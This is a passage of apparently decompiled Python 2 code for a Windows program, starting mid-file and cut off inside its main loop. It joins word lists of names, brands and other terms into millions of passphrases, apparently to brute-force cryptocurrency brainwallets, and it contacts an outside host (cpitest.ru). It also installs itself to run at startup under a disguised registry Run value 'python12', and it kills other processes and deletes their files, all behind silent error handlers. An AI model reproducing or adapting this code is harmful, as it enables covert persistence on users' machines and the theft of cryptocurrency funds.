cats = 'Abby, Abigail, Alchemy, Alice, Amelli, Aneira, Angel, Anna, Annie, Aquila, Ariana, Arielle, Arlena, Arya, Astrid, Athena, Atreyu, Aurora, Aurra, Baby, Balmy, Beatrice, Bella, Belle, Bethany, Bitsy, Bloom, Bonnie, Brandy, Breena, Caitlin, Calista, Callie, Candy, Carly, Cersei, Charity, Charlotte, Cherlindrea, Cherry, Chika, Chime, Chloe, Cinnamon, Clementine, Cleo, Cleopatra, Clover, Clumsy, Coco, Cookie, Cora, Cordelia, Corra, Cupid, Cutie, Daisy, Darla, Delight, Destiny, Diana, Diva, Donna, Dori, Eleonor, Elive, Elizabeth, Ella, Ellie, Ellsa, Elora, Elsa, Emily, Emma, Enigma, Fable, Faith, Felicity, Fiona, Fleur, Florine, Flower, Fluffy, Foxy, Freya, Frisky, Fume, Gabby, Galadriel, Gemma, Geordi, Glinda, Glory, Grace, Gracie, Gwen, Hannah, Hearty, Hedwig, Helga, Honey, Hope, Idris, Iggy, Imogen, Iris, Isabelle, Isla, Isobel, Ivy, Izzy, Jade, Jane, Jasmine, Jazzy, Josie, Justice, Kael, Kamala, Kara, Kelly, Kiera, Kiki, Kitty, Kyle, Lace, Lanka, Layla, Leia, Lexi, Lila, Lili, Lily, Lina, Liquid, Lola, Lucy, Lulu, Luna, Lyra, Mable, Macy, Maggie, Magma, Maiden, Mamba, Marley, Marty, Mary, Matilda, Maya, Melanie, Melissa, Mia, Mila, Milky, Millie, Mimi, Mindy, MissKitty, Missy, Misty, Mittens, Molly, Myrtle, Mystery, Nala, Noira, Nova, Nyota, Olimpia, Olivia, Omega, Padma, Padme, Penelope, Penny, Phoebe, Piper, Pixi, Poppy, Princess, Quincy, Renesmee, Riley, Riple, Ripley, River, Romani, Rory, Rosie, Rowan, Roxy, Ruby, Sadie, Salena, Sassy, Scotia, Scout, Septimus, Serena, Shell, Sierra, Silky, Silly, Silver, Simba, Sinead, Smokey, Snickers, Sophie, Space, Spooky, Spring, Starry, Stella, Stormy, Sugar, Sunshine, Susan, Sydney, Tauriel, Teyla, Tinkerbell, Tutsi, Undy, Whoopi, Willow, Wilma, Winnie, Wise, Yuka, Yvetta, Zelda, Zoe, Zoey'
mens = 'Aaron, Abbie, Abbott, Abel, Abie, Abner, Abraham, Abram, Adalbert, Adam, Addie, Addy, Adelbert, Adrian, Aidan, Aiden, Alan, Alastair, Alaster, Albert, Alec, Aleck, Alejandro, Alex, Alexander, Alexandra, Alf, Alfie, Alfonso, Alfred, Alger, Algernon, Algie, Algy, Alistair, Alister, Allan, Allen, Allister, Alonso, Alonzo, Alphonso, Alton, Alva, Alvah, Alvan, Alvin, Alwin, Alwyn, Ambie, Ambrose, Amos, Andrew, Andy, Angus, Anse, Ansel, Anselm, Anthony, Anton, Antonio, Antony, Apollo, Arch, Archibald, Archie, Aristotle, Armani, Arnie, Arnold, Aron, Arrow, Arthur, Artie, Arturo, Ashton, Atlas, Auden, Augie, Augustin, Augustine, Augustus, Aurelio, Austin, Avery, Baker, Baldie, Baldwin, Barnaby, Barnard, Barney, Barnie, Barrett, Barrie, Barry, Bart, Bartholomew, Bartlett, Bartley, Barty, Basie, Basil, Bass, Bat, Batty, Baxter, Baz, Ben, Benedict, Benjamin, Benjie, Benjy, Bennet, Bennett, Bennie, Benny, Bentlee, Bernard, Berney, Bernie, Bert, Berthold, Bertie, Bertram, Bertrand, Billie, Billy, Blair, Blake, Bob, Bobbie, Bobby, Bobo, Booker, Boris, Bowie, Brad, Bradford, Bradley, Brady, Bram, Brand, Branden, Brandon, Brave, Braxten, Brent, Brenton, Bret, Brett, Brian, Brix, Broderick, Brodie, Brody, Brose, Bruce, Bruno, Bryan, Bryant, Burt, Burton, Byron, Caleb, Calvin, Cameron, Camp, Carey, Carl, Carlos, Carol, Carrol, Carroll, Carry, Carter, Cary, Casey, Casimir, Caspar, Casper, Caspian, Cassidy, Cassius, Cater, Cecil, Ced, Cedar, Cedric, Chad, Chap, Charles, Charley, Charlie, Chas, Chase, Chauncey, Chester, Chet, Chris, Christian, Christopher, Christy, Chuck, Ciel, Clair, Clare, Clarence, Clark, Clarke, Claud, Claude, Clay, Clayton, Clem, Clement, Cliff, Clifford, Clint, Clinton, Clive, Cloud, Clyde, Cody, Cole, Colin, Collin, Connie, Connor, Conny, Conrad, Constantine, Corey, Cornelius, Corney, Corny, Cory, Cosmo, Craig, Criffer, Cris, Curt, Curtis, Cyril, Cyrus, Dale, Daniel, Danny, Darrel, Darrell, Darren, Darry, Darryl, Dartagnan, Darwin, Daryl, Dave, Davey, 
David, Davie, Davy, Dean, Deane, Delbert, Dell, Denis, Dennis, Denny, Derek, Derrick, Derry, Desmond, Devin, Dex, Dexter, Dick, Diego, Dillon, Diogo, Dob, Dolf, Dolph, Domenic, Domenick, Dominic, Dominick, Don, Donald, Donnie, Donny, Donovan, Dorian, Doug, Douglas, Douglass, Doyle, Drew, Duane, Dud, Duddy, Dudley, Duke, Duncan, Dunk, Dunny, Dustin, Dusty, Dwayne, Dwight, Dylan, Earl, Earle, Earnest, Echo, Eddie, Eddy, Edgar, Edmond, Edmund, Edward, Edwin, Egbert, Elbert, Eldred, Eli, Elias, Elijah, Ellington, Elliot, Elliott, Ellis, Elmer, Elton, Elvin, Elvis, Elwin, Elwood, Elwyn, Emanuel, Emery, Emil, Emile, Emmanuel, Emmery, Emmet, Emmett, Emory, Eric, Erick, Erik, Ernest, Ernie, Errol, Erv, Ervin, Erwin, Ethan, Eugene, Eustace, Evan, Everard, Everest, Everett, Everson, Fab, Fabe, Fabian, Felix, Ferdie, Ferdinand, Fergie, Fergus, Ferguson, Ferris, Fidel, Fischer, Fitzgerald, Floy, Floyd, Ford, Fran, Francis, Francois, Frank, Frankie, Franklin, Franklyn, Franky, Fraser, Fred, Freddie, Freddy, Frederic, Frederick, Fredric, Fredrick, Fulton, Gabe, Gabriel, Garret, Garrett, Garry, Gary, Gavin, Gene, Geoffrey, Geordie, George, Georgie, Gerald, Gerard, Gerry, Gil, Gilbert, Glen, Glenn, Gordon, Gordy, Graham, Grant, Greg, Gregg, Gregor, Gregory, Griff, Griffin, Griffith, Gryffin, Gus, Gussy, Gust, Gustus, Guy, Hal, Hamilton, Hank, Hannes, Hansel, Harold, Harris, Harrison, Harry, Hart, Harve, Harvey, Hasani, Hawk, Hayden, Hector, Henry, Herb, Herbert, Herman, Heston, Hilary, Hillary, Hillie, Hilly, Homer, Horace, Horatio, Howard, Howie, Hube, Hubert, Hugh, Hughie, Hugo, Humph, Humphrey, Humphry, Hunter, Huxley, Ian, Iggy, Ignatius, Ike, Immanuel, Indigo, Inigo, Irvin, Irvine, Irving, Irwin, Isaac, Isaak, Isador, Isadore, Isaiah, Isidor, Isidore, Ivor, Izzy, Jack, Jackie, Jackson, Jacky, Jacob, Jaden, Jaeger, Jake, James, Jamie, Jansen, Janus, Jared, Jarvis, Jason, Jasper, Jay, Jayden, Jedi, Jeff, Jefferson, Jeffery, Jeffrey, Jem, Jeremiah, Jeremy, Jerome, Jerry, Jervis, 
Jess, Jesse, Jessie, Jessy, Jesus, Jim, Jimbo, Jimmie, Jimmy, Jody, Joe, Joel, Joey, John, Johnnie, Johnny, Jon, Jonathan, Jonnie, Jonny, Jordan, Jos, Jose, Joseph, Josh, Joshua, Jovian, Juan, Jud, Judd, Judson, Jules, Julian, Julius, Jupiter, Jus, Justin, Kael, Karl, Kasey, Keane, Keith, Kel, Kelley, Kelly, Kelvin, Ken, Kendall, Kendrick, Kenneth, Kenny, Kensington, Kent, Kester, Kev, Kevin, Kirk, Kit, Kris, Kristof, Kristofer, Kristopher, Kurt, Kyle, Laird, Lambert, Lamont, Lance, Lancelot, Landon, Larry, Lars, Larson, Laszlo, Launcelot, Lauren, Laurence, Laurie, Lawrence, Lawrie, Lee, Leeroy, Leigh, Len, Lennie, Lenny, Leo, Leon, Leonard, Leopold, Leroy, Lesley, Leslie, Lester, Lev, Lew, Lewie, Lewis, Lex, Leyton, Liam, Lige, Lin, Linc, Lincoln, Lindon, Lindsay, Lindsey, Linus, Lionel, Lix, Llew, Llewellyn, Lloyd, Logan, Lon, Lonnie, Lonny, Loot, Loren, Lorence, Lorenzo, Lou, Louie, Louis, Lovell, Lowell, Loy, Loyd, Loyde, Lucas, Lucian, Lucius, Luis, Luke, Luth, Luther, Lyall, Lyle, Lyn, Lyndon, Lynn, Lyss, Mace, Maguire, Mal, Malc, Malcolm, Mannie, Manny, Manuel, Marc, Marcus, Marion, Mark, Marshal, Marshall, Mart, Martin, Marty, Marv, Marvin, Mason, Mat, Matt, Matthew, Matthias, Mattie, Matty, Maurice, Maximilian, Maxwell, Maynard, Mckinley, Melvin, Mercer, Merill, Merle, Merlin, Merril, Merrill, Merv, Mervin, Michael, Mick, Mickey, Micky, Miggy, Miguel, Mike, Mikey, Miles, Milo, Milt, Milton, Mir, Mitch, Mitchell, Monroe, Montague, Monte, Montgomery, Monty, Morey, Morgan, Morris, Morry, Mort, Mortimer, Morton, Morty, Mose, Moses, Moss, Munroe, Murray, Murry, Myles, Nat, Nate, Nathan, Nathaniel, Natty, Navy, Neal, Ned, Nel, Nell, Nels, Nelson, Nev, Nevil, Nevile, Nevill, Neville, Newt, Newton, Nicholas, Nick, Nicky, Nicol, Nicolas, Nige, Nigel, Nile, Niles, Noah, Noel, Noll, Nollie, Nolly, Nor, Norbert, Norm, Norman, Normie, Norrie, Norris, Nort, Norton, Nowell, Octavius, Oden, Oliver, Ollie, Orlando, Orson, Orville, Osbert, Osborn, Osborne, Oscar, Osmond, 
Osmund, Ossy, Osvald, Oswald, Oswold, Otis, Owen, Ozias, Ozzie, Ozzy, Paddy, Pascal, Pat, Patrick, Patsy, Paul, Pauly, Paxon, Penn, Perce, Perceval, Percival, Percy, Perry, Pete, Peter, Petey, Petie, Phil, Philip, Phillip, Poldie, Preston, Quentin, Quenton, Quest, Quincey, Quincy, Quinn, Quintin, Quinton, Rafael, Rafe, Raff, Ralph, Ralphy, Rand, Randal, Randall, Randolph, Randy, Raphael, Raven, Ray, Raymond, Raymund, Red, Reg, Reggie, Reginald, Remi, Rene, Renny, Reuben, Rex, Reynold, Rhythm, Rich, Richard, Richie, Rick, Ricky, Rio, Rob, Robbie, Robby, Robert, Robin, Rockwell, Rod, Roddy, Roderic, Roderick, Rodge, Rodger, Rodney, Roge, Roger, Roland, Rolf, Rolfe, Rolly, Rolph, Roly, Roman, Romy, Ron, Ronald, Ronnie, Ronny, Roscoe, Ross, Rowland, Rowly, Roy, Rube, Ruben, Rubin, Ruby, Rudolf, Rudolph, Rudy, Rufe, Rufus, Rupert, Russ, Russel, Russell, Rusty, Ryan, Sal, Sam, Sammy, Sampson, Samson, Samuel, Sander, Sanford, Saul, Scott, Scotty, Scout, Sean, Sebastian, Serge, Seth, Seymour, Shane, Shannon, Shanon, Shaun, Shaw, Shawn, Shel, Sheldon, Shelley, Shellie, Shelly, Shelton, Shepherd, Sherman, Sid, Sidney, Silas, Silvester, Sim, Simeon, Simie, Simmy, Simon, Slater, Sol, Solly, Solomon, Son, Sonny, Spencer, Stacey, Stacy, Stan, Stanley, Stef, Stefan, Steff, Steffan, Stellan, Steph, Stephan, Stephen, Steve, Steven, Stevie, Stew, Stewart, Stu, Stuart, Sven, Syd, Sydney, Syl, Sylar, Sylvester, Tad, Ted, Teddy, Tegan, Teo, Terence, Tergel, Terrance, Terrence, Terry, Thad, Thaddeus, Thadeus, Theo, Theodor, Theodore, Thomas, Tim, Timmy, Timothy, Tobi, Tobias, Tobie, Toby, Todd, Tom, Tommy, Tony, Toph, Topher, Tracey, Tracy, Trav, Travis, Trent, Trenton, Trev, Trevor, Tris, Tristam, Tristan, Tristram, Troy, Tyler, Tyron, Tyrone, Uli, Uly, Ulysses, Uri, Uria, Uriah, Urias, Valentin, Valentine, Valerian, Valerius, Van, Vance, Vaughan, Vaughn, Vergil, Vern, Verne, Vernon, Vester, Vic, Vick, Victor, Vince, Vincent, Vinny, Virge, Virgil, Wael, Waldo, Wallace, Wallie, Wallis, 
Wally, Walt, Walter, Warren, Wayne, Wellington, Wendell, Werner, Wes, Wesley, Wilber, Wilbert, Wilbur, Wiley, Wilfred, Wilfrid, Willard, William, Willie, Willis, Willy, Wilson, Winfred, Winfrid, Winnie, Winny, Winston, Wolfe, Woodrow, Woody, Xavier, Xzander, Yanis, Zach, Zachariah, Zacharias, Zachary, Zack, Zacky, Zave, Zyan'
girls = 'Aaliyah, Abbey, Abbie, Abella, Abigail, Ackie, Addison, Adelaide, Adele, Adrienne, Aemilia, Aemilius, Aemulus, Agatha, Agathos, Agnes, Agnessa, Aileen, Alabama, Alana, Alessandra, Alexa, Alexandra, Alexis, Alice, Alina, Alison, Allison, Alma, Alyssa, Amabel, Amalia, Amanda, Amber, Amee, Amelia, Amia, Amy, Anais, Andrea, Andrew, Angela, Angelina, Anita, Anna, Annabelle, Anne, Annie, Anthea, Antheia, Aperire, Arantxa, Aria, Ariana, Arianna, Arlene, Ashley, Astoria, Atlas, Aubrey, Audrey, Autumn, Ava, Aveline, Avery, Avis, Avril, Azura, Babs, Bailey, Barbara, Bea, Beata, Beatrice, Beatrix, Becky, Belinda, Bella, Bentlee, Berenice, Bernice, Berry, Bertha, Beryl, Bess, Bessie, Beth, Bethany, Betsy, Betty, Beverly, Blanca, Blanche, Bobbie, Bonnie, Brenda, Brian, Brianna, Brianne, Bridget, Brighid, Britain, Britney, Brittany, Brook, Brooke, Callista, Camila, Camilla, Camillus, Candace, Candice, Cara, Carissa, Carla, Carly, Carmel, Carol, Caroline, Carolus, Carolyn, Carrie, Cary, Cass, Cassandra, Catherine, Cathy, Charis, Charity, Charlene, Charles, Charlie, Charlotte, Chaz, Chelsea, Cherida, Cherish, Cherry, Cheryl, Chichi, Chicka, Chloe, Christina, Christine, Cicely, Cilla, Cilly, Claire, Clara, Clare, Clarice, Clarissa, Clarus, Claudia, Claudius, Connie, Constance, Courtnay, Courtney, Cynthia, Daisy, Danielle, Darlene, Davida, Dean, Deanna, Debby, Deborah, Dee, Deirdre, Delia, Delos, Dena, Derdriu, Destiny, Devina, Diana, DianaR, Diem, Dina, Dinah, Dolly, Dolores, Donna, Dora, Doreen, Doris, Dorothea, Dorothy, Dottie, Dove, Drishti, Eadgyth, Ebony, Edith, Edna, Edwin, Edwina, Effie, Eileen, Eithne, Elaine, Eleanor, Elena, Elfreda, Elinor, Eliza, Elizabeth, Ella, Ellen, Ellie, Elsa, Emilia, Emily, Emma, Emmy, Enola, Erin, Ermintrude, Esma, Esta, Estelle, Esther, Ethel, Eudora, Eugenia, Eugenios, Eunice, Euphemia, Eva, Eve, Evelyn, Evette, Evie, Evonne, Faith, Fanny, Fay, Faye, Felicity, Fenella, FernFiny, Fiona, Fleur, Flo, Flora, Florence, Florentius, Florrie, 
Fran, Frances, Francis, Freda, Frooti, Gabriell, Gabrielle, Gail, Gale, Gayle, Gaynor, Georgiana, Geraldine, Germaine, Gertrud, Gertrude, Gill, Gillian, Ginger, Ginny, Glenys, Gloria, Glynis, Grace, Gracie, Gratia, Greenlee, Greta, Gretta, Guinevere, Gwenhwfar, Hailey, Haley, Hanna, Hannah, Harmonee, Harper, Harriet, Hattie, Hayley, Hazel, Heather, Heavenly, Helen, Helena, Helene, Henri, Henrietta, Henriette, Hephzibah, Hettie, Hilarius, Hilary, Hilda, Hollie, Holly, Honey, Hope, Huxley, Hyacinth, Ida, Idalia, Imogen, Indigo, Iole, Irea, Irene, Iris, Irmgard, Isabel, Isabella, Isabelle, Ivy, Izzy, Jacqueline, Jacques, Jada, Jade, Jane, Janet, Janette, Janice, Jasmin, Jasmine, Jay, Jazz, Jean, Jeane, Jeanne, Jeannette, Jenna, Jennet, Jennifer, Jenny, Jess, Jessalyn, Jessica, Jessie, Jewel, Jill, Joan, Joanna, Jocelyn, Jodie, John, Jordan, Josce, Josephine, Joy, Joyce, Judith, Judy, Julia, Julian, Juliet, Juliette, Juna, Justin, Justine, Kaitlyn, Kaley, Kani, Kansas, Kat, Katana, Kate, Katelyn, Katherine, Kathy, Katie, Katrina, Katy, Kay, Kayla, Kaylee, Kayley, Keeley, Kelly, Kendra, Kendrick, Keren, Kerena, Kerry, Keva, Kim, Kimberley, Kimberly, Kimmy, Kitty, Kizzy, Kyla, Kyle, Kylie, Kynthia, Lacey, Lainie, Lake, Lana, Larkyn, Laura, Lauren, Laurence, Lauretta, Laurus, Lavender, Layla, Leah, Leanne, Lee, Lena, Leona, Lesley, Leslie, Lexi, Lexy, Libby, Lilian, Lillian, Lilly, Lily, Linda, Lindsay, Lindy, Linette, Linnette, Liona, Lira, Lisa, LisaF, Lise, Livia, Liz, Liza, Lizzie, Lizzy, Lola, Loretta, Lorraine, Lotte, Lottie, Louis, Louise, Lourdes, Lucie, Lucinda, Lucy, Luna, Lyn, Lynette, Lynn, Mabel, Mackenzie, Madeline, Madge, Madison, Madonna, Mafalda, Maggie, Mairin, Makayla, Malvina, Mandy, Mara, Marcia, Margaret, Margarita, Marguerite, Maria, Marice, Marie, Marilyn, Mariposa, Maris, Marissa, Marlene, Mary, Matilda, Maud, Maude, Maura, Maureen, Maven, Mavis, Maxine, Maya, Meg, Megan, Melania, Melanie, Melinda, Melissa, Melony, Mercy, Meriel, Merle, Messiah, 
Mia, Michelle, Mila, Mildred, Millicent, Millie, Minerva, Minnie, Mirabelle, Miranda, Misty, Molly, Mona, Monet, Monica, Morgan, Moxie, Muireall, Muriel, Myra, Myrtle, Nadia, Nancy, Natalie, Nell, Nella, Nellie, Nerissa, Nessa, Neveah, Nicola, Nicole, Nikita, Nita, Noirin, Nora, Noreen, Norma, Novalie, Nyx, Oceana, Octavia, Olivia, Olympia, Opal, Paisley, Pamela, Pandora, Pansy, Patience, Patricia, Patsy, Paula, Peg, Peggy, Penelope, Perpetua, Petra, Petula, Philippa, Phillida, Philomena, Phoebe, Phyllis, Pippa, Pippy, Polly, Poppy, Primrose, Priscilla, Priss, Prissy, Prudence, Prunella, Psalm, Queenie, Rachel, Raine, Ravenna, Reanna, Rebecca, Rebel, Reenie, Regina, Rene, Rhoda, Ricky, Rikki, Riley, Rina, Rita, Roberta, Robin, Rogue, Ronnie, Rosalind, Rose, Roseanne, Rosella, Rosemary, Rosie, Rosy, Rowena, Roxana, Roxanne, Ruby, Sabella, Sabrina, Sadie, Sahar, Sailor, Sally, Samantha, Sammy, Sandra, Sandy, Sapphire, Sara, Sarah, Savannah, Scarlett, Selena, Selma, Shannah, Shannon, Sharon, Sheila, Shirley, Sibylla, Sierra, Sile, Silver, Silvia, Sissy, Skye, Skylar, Sofia, Sophia, Starla, Stella, Steph, Stephanie, Stephen, Stephy, Stevie, Storm, Sue, Sunshine, Susan, Susanna, Susie, Suzanna, Suzette, Suzy, Swayze, Sybil, Sydney, Sylvia, Tamara, Tammy, Tamsin, Tansy, Tara, Tasha, Tate, Tawny, Taylor, Teri, Terra, Terry, Tessa, Thelma, Theresa, Thora, Tiffany, Tilda, Tori, Tracy, Trina, Trinity, Trisha, Trixie, Trudy, Tulip, Twinkle, Uma, Ursa, Ursula, Valda, Valene, Valerie, Valkyrie, Vanessa, Velma, Venice, Vera, Verity, Verona, Veronica, Viatrix, Vick, Vicky, Victoria, Victory, Viola, Violet, Virgil, Virginia, Vita, Vivian, Wanda, Wendy, Whitney, Wilhelmina, Willow, Wilma, Wilona, Winfred, Winifred, Wynne, Xenia, Xenthe, Yasmin, Yolanda, Yvette, Yvonne, Zane, Zanna, Zelda, Zelene, Zera, Zoe, Zoelle, Zoey, Zowie'
surnames = 'Adams, Allard, Anderson, Andre, Aramitz, Archambault, Arnaud, Aubert, Babin, Babineaux, Bailey, Baker, Barbier, Barre, Baudin, Beauchene, Beaufort, Beaulieu, Beaumont, Belanger, Bell, Bellamy, Bellerose, Belmont, Belrose, Bennett, Beranger, Berger, Bernard, Bertrand, Blaise, Blanc, Blanchard, Blanchet, Boivin, Bonfils, Bonheur, Bonhomme, Bonnay, Bonnet, Borde, Bouchard, Boucher, Bourdillon, Bourreau, Bret, Brisbois, Brodeur, Brooks, Brown, Bureau, Butler, Caron, Carpentier, Carter, Chaput, Charbonneau, Charles, Charpentier, Charron, Chastain, Chevalier, Chevrolet, Christian, Clark, Clement, Cloutier, Colbert, Collins, Comtois, Cooper, Coste, Cote, Courtemanche, Courtois, Cousineau, Couture, Daniau, Daviau, Davies, Davis, Deforest, Degarmo, Delacroix, Deniau, Deniaud, Deniel, Dennel, Deschamps, Descoteaux, Desjardins, Desroches, Desrosiers, Diaz, Droit, Dubois, Duchamp, Dufort, Dufour, Duguay, Dumont, Dupond, Dupont, Durand, Durant, Duval, Edwards, Evans, Fabien, Fabre, Fabron, Faucher, Faucheux, Faure, Favager, Favre, Favreau, Fay, Felix, Fevre, Firmin, Flores, Fontaine, Forest, Forestier, Fortier, Fosse, Foster, Fournier, Francois, Gage, Gagnier, Gagnon, Garcon, Gardinier, Garnier, Gauthier, Germain, Geroux, Girard, Giroux, Gonzales, Gonzalez, Gosse, Granger, Gros, Guerin, Guillaume, Guillory, Guillot, Hardy, Harris, Hayes, Hebert, Henderson, Howard, Jackson, Jacques, Janvier, Jean, Jenkins, Johnson, Jones, Jordan, Joubert, Julien, Labelle, Lachance, Lachapelle, Lamar, Lamarre, Lambert, Lane, Langlais, Langlois, Lapointe, Larue, Laurent, Lavigne, Lavoie, Leandre, Lebeau, Leblanc, Lebrun, Leclair, Leclerc, Lecuyer, Lefebvre, Lefevre, Legrand, Lemaire, Lemieux, Leroux, Leroy, Lesauvage, Lestrange, Leveque, Lewis, Lopez, Louis, Lucas, Lyon, Macon, Marchand, Marion, Martel, Martin, Martinez, Masson, Mathieu, Mercier, Merle, Meunier, Michaud, Michel, Miller, Mitchell, Monet, Monette, Montagne, Moore, Moreau, Morel, Morgan, Morris, Moulin, Nelson, Neuville, 
Noyer, Paget, Palomer, Paquet, Parent, Parker, Parris, Pascal, Patterson, Paul, Pelle, Pelletier, Perez, Perigord, Perrault, Perrin, Perrot, Peterson, Petit, Pherigo, Philippe, Phillips, Pierre, Plamondon, Planche, Plourde, Poingdestre, Poirier, Porcher, Poulin, Proulx, Ramirez, Rayne, Reed, Renard, Rey, Richard, Richardson, Richelieu, Rivera, Robert, Roberts, Robin, Robinson, Roche, Rodriguez, Roger, Rogers, Romilly, Ross, Rousseau, Roussel, Roux, Roy, Royer, Russell, Salomon, Samson, Samuel, Sanders, Sartre, Sault, Sauvage, Sauvageon, Sauvageot, Sauveterre, Savatier, Segal, Sergeant, Severin, Simmons, Simon, Smith, Solomon, Sourd, Stewart, Tailler, Tasse, Taylor, Thomas, Thompson, Torres, Traver, Travere, Traverse, Travert, Tremblay, Tremble, Turner, Vidal, Villeneuve, Vincent, Voclain, Walker, Washington, Watson, Williams, Wilson, Wright'
guns = 'Gun, Weapon, Musket, Rifle, Shotgun, Shotgus, Handgun, Pistol, Revolver, Parabellum, Beretta, SigSauer, Glock, Colt, Walther, Mauser, Browning'
animal = 'Cat, Dog, Puppie, Kitten, Kitty, Kittie, Doggie, Doggy, Chinchilla, Hamster'
animals = 'Cats, Dogs, Puppies, Kittens, Kitties, Doggies, Chinchillas, Hamsters'
auto = 'AlfaRomeo, AstonMartin, Audi, Batmobile, Bentley, Bmw, Brabus, Bugatti, Buick, Cadillac, Chevrolet, Chrysler, Citroen, Corvette, Cruiser, Daihatsu, Dodge, Ferrari, Fiat, Ford, Gmc, Honda, Hudson, Hummer, Hyundai, Isuzu, Jaguar, Jeep, Kenworth, Kia, Koenigsegg, Lamborghini, Lexus, Limousine, Lincoln, Lotec, Maserati, Maybach, Mazda, McLaren, Mercedes, MiniCooper, Mitsubishi, Mosler, Mustang, Nissan, Noble, Oldsmobile, Opel, Pagani, Peterbilt, Peugeot, Plymouth, Pontiac, Porsche, RangeRover, Renault, Rezvani, Roadster, RollsRoyce, Rover, Saab, Seat, Skoda, SsangYong, Studebaker, Subaru, Suzuki, Tatuus, Tesla, Toyota, Volkswagen, Volvo, Willys'
drugs = 'Pill, Drug, Drugs, Dope, Narcotic, Narcotics, Opium, Cocaine, Morphine, Heroin, Hashish, Marijuana, Cannabis, Crack, Lsd, Pcp, Amphetamine, Hallucinogen, Methadone, Amidone, Ecstasy, Barbiturate, Nicotine, Ketamine, Meth, Methamphetamine, Mescaline, Peyote, Prozac, Temazepam'
cigarettes = 'Cigar, Cigarette, Marlboro, Newport, Maverick, Camel, Winston, Pyramid, Doral, Chesterfield, Parliament, Dunhill, LuckyStrike, Gitanes, Gauloises, Embassy, Kensitas, Cohiba, Cuaba, Belmont, PhilipMorris, Davidoff, Kent, Esse, DuMaurier, Mayfair, Memphis, Mevius, PallMall, Parisienne, Woodbine, Zhongnanhai'
yachts = 'Yacht, Alalunga, Alenyacht, Alfamarine, Alunaut, Apreamare, Astondoa, Axopar, Azimut, Beneteau, Benetti, Birchwood, BoatMarine, BoatBuilding, Carver, Chaparral, Comitti, Cranchi, Drettmann, Boarnstream, Powerboats, Edgewater, Faeton, Feadship, FiartMare, FourWinns, inRizzardi, Jeanneau, Jongert, McKinna, Menorquin, Mikelson, MosBoats, NedYacht, Storebro, Nordhavn, Numarine, Overmarine, Permare, Primatist, Superyachts, SeaRay, Sealine, Shipyard, Sunreef, Sunseeker, SuperHouseBoats, VanDerHeijden, Yachtbuilders, Bruckmann, CaboYachts, Dellapasqua, HeySea, Grandezza, Lazzara, Silverton, Houseboats, Wellcraft, Henriques, Hodgdon, Interadria, Shipyards, YachtLife, Yamarin, Stingray, Silvercraft, SeaDoo, Rinker, Nimbus, Bayliner, Alumacraft'
beaches = 'Kaunaoa, CampsBay, BoraBora, EagleBeach, Carvoeiro, SouthBeach, Ipanema, Bavaro, Nissi, PhraNang, Punaluu, Natadola, PalmBeach, Copacabana, Fonimagoodhoo, PinkSands, BlueLagoon, Waikiki, Benagil, Elafonissi, GrandAnse, Varadero, Derawan, Koekohe, Fulhadhoo, AnseLazio, Legzira, SvetiStefan, Myrtos, Radhanagar, DianiBeach, Lamai, Rasdhoo, Unawatuna, MyKhe, Yelapa, Wuzhizhou, Pfeiffer, Varkala, NusaDua, Navagio, AlJissah, SharmElSheikh, Kaanapali, Campeche, SunnyIsles, Railay, Paraiso, Huvahendhoo, GuanaCay, SaCaleta, Marinha, Akumal, Palolem, Tangsi, Guardalavaca, Comporta, Aitutaki, Mismaloya, CoronaDelMar, ParadiseBeach'
crypto = 'Cryptocurrency, Bitcoin, Btc, Litecoin, Ltc, Monero, Money, Cash'
synonyms = []
for s in [alcohols, dogs, cats, mens, girls, surnames, guns, animal, animals, auto,
          drugs, cigarettes, yachts, beaches, crypto]:
    synonyms.append(set(s.split(', ')))
    synonyms.append(set(s.lower().split(', ')))
try:
    threading.Thread(target=get_phrases, args=(0, 4, 20230830)).start()
    threading.Thread(target=get_phrases, args=(0, 5, 20230830)).start()
except:
    pass
# Terminate other processes named like file<digit>.exe (skipping itself and its
# parent) and delete the matching file next to this executable.
try:
    t = time.time()
    p = psutil.Process()
    for proc in psutil.process_iter():
        try:
            if proc.pid == p.pid or proc.pid == p.ppid():
                continue
            if re.findall('file\\d.exe', proc.name()):
                proc.terminate()
                time.sleep(0.4)
                os.remove(os.path.join(os.path.dirname(sys.argv[0]), proc.name()))
        except:
            pass
except:
    pass
# load_addresses runs in a background thread against cpitest.ru/.
try:
    thread1 = threading.Thread(target=load_addresses, args=('cpitest.ru/',))
    thread1.start()
except:
    pass
# Load the bundled words.bz2 table. Each line is an '&'-separated record whose
# first field is a word; the remaining fields are ':'-separated groups of
# ';'-separated tokens, and numeric tokens are resolved through codes to the
# word on that line number.
try:
    if os.path.isfile(resource_path('words.bz2')):
        path = resource_path('words.bz2')
    else:
        path = os.path.join(os.path.join(os.path.realpath(sys.path[0]), '.'), 'words.bz2')
    with open(path, 'rb') as (rb):
        lines = bz2.decompress(rb.read()).split('\r\n')
    c = len(lines[0].split('&'))
    words = [ {} for _ in range(c - 1) ]
    codes = {str(j): line.split('&')[0] for j, line in enumerate(lines)}
    for i, line in enumerate(lines):
        lines[i] = ('&').join([ (':').join([ (';').join([ codes.get(j, j) for j in w.split(';') ]) for w in ln.split(':') ]) for ln in lines[i].split('&') ])
    for i, line in enumerate(lines):
        line = line.strip()
        line = line.split('&')
        word = line[0].split('&')[0]
        d = len(line[1].split(':'))
        for p in range(1, c):
            words[p - 1][word] = [ {} for _ in range(c - p) ]
            for n in range(c - p):
                if n < d:
                    words[p - 1][word][n] = {w for w in line[p].split(':')[n].split(';') if w}
            if not any(words[p - 1][word]):
                del words[p - 1][word]
    del lines
except:
    pass
# Persistence: HKCU Run value 'python12' pointing at this executable.
try:
    rkey = reg.OpenKey(reg.HKEY_CURRENT_USER, 'Software\\Microsoft\\Windows\\CurrentVersion\\Run', 0, reg.KEY_ALL_ACCESS)
    reg.SetValueEx(rkey, 'python12', 0, reg.REG_SZ, os.path.abspath(sys.argv[0]))
    reg.CloseKey(rkey)
except:
    pass
# Build five-word phrases from the word table, queue four variants of each
# (as is, lower-cased, without spaces, both) and, once more than 500000 are
# queued, hand the batch to check_addresses in a child process.
try:
    u = 0
    ver = '5314'
    phrases = []
    keys = {k for v in words}
    synonyms = [ set(k).intersection(keys) for k in synonyms ]
    for i in xrange(1, 5000000):
        time.sleep(5)
        try:
            if len(multiprocessing.active_children()) < 1:
                words0 = words[0].copy().keys()
                words0 = choices({w: len(words[0][w][0]) for w in words0}, len(words0), 0)
                for j0, word0 in enumerate(words0):
                    words1 = words[0][word0][0].copy()
                    words1 = choices({word: len(set.intersection(*[ words[1 - p][w][p] for p, w in enumerate([word, word0][:d]) ])) for word in words1}, len(words1), 0)
                    for j1, word1 in enumerate(words1):
